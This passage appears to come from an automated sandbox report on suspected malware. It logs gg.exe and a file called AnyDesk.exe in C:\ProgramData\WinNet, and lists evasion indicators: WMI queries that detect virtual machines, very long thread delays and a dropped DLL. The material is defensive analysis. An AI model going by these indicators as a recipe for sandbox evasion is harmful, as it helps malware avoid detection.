                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\AnyDesk.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\WinNet\gg.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Queries memory information (via WMI often done to detect virtual machines)
                                Source: C:\ProgramData\WinNet\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_PhysicalMemory
                                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Source: C:\ProgramData\WinNet\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_DiskDrive
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                                Source: C:\ProgramData\WinNet\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT MACAddress FROM Win32_NetworkAdapter WHERE PhysicalAdapter = TRUE
                                Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
                                Source: C:\ProgramData\WinNet\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_PhysicalMemory
                                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\ProgramData\WinNet\gg.exeMemory allocated: 2A20000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeMemory allocated: 2BD0000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeMemory allocated: 2A40000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeMemory allocated: 3080000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeMemory allocated: 32B0000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeMemory allocated: 1750000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exeMemory allocated: 30F0000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exeMemory allocated: 3040000 memory reserve | memory write watch
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                                Source: C:\ProgramData\WinNet\gg.exeWindow / User API: threadDelayed 1641Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeWindow / User API: threadDelayed 2781Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeWindow / User API: threadDelayed 2051Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeWindow / User API: threadDelayed 4454Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeWindow / User API: threadDelayed 1576
                                Source: C:\ProgramData\WinNet\gg.exeWindow / User API: threadDelayed 4133
                                Source: C:\ProgramData\WinNet\AnyDesk.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gcapi.dllJump to dropped file
                                Source: C:\ProgramData\WinNet\AnyDesk.exeDropped PE file which has not been started: C:\ProgramData\WinNet\gcapi.dllJump to dropped file
                                Source: C:\ProgramData\WinNet\AnyDesk.exeAPI coverage: 2.0 %
                                Source: C:\ProgramData\WinNet\gg.exe TID: 7468Thread sleep time: -11990383647911201s >= -30000sJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exe TID: 6644Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 5776Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 6988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 5776Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 7068Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exe TID: 6948Thread sleep count: 2051 > 30Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exe TID: 6948Thread sleep count: 4454 > 30Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exe TID: 7400Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                                Source: C:\ProgramData\WinNet\gg.exe TID: 6952Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 4416Thread sleep time: -1844674407370954s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 2504Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 6980Thread sleep time: -30000s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 6640Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exe TID: 4416Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\gg.exe TID: 7836Thread sleep time: -11068046444225724s >= -30000s
                                Source: C:\ProgramData\WinNet\gg.exe TID: 7656Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\ProgramData\WinNet\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\AnyDesk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ProcessorId FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\gg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C5F147 GetLocalTime followed by cmp: cmp dx, 000ch and CTI: jbe 69C5F183h19_2_69C5F147
                                Source: C:\ProgramData\WinNet\AnyDesk.exeCode function: 19_2_69C3F1AA VirtualQuery,GetSystemInfo,19_2_69C3F1AA
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\gg.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\ProgramData\WinNet\AnyDesk.exeThread delayed: delay time: 922337203685477Jump to behavior
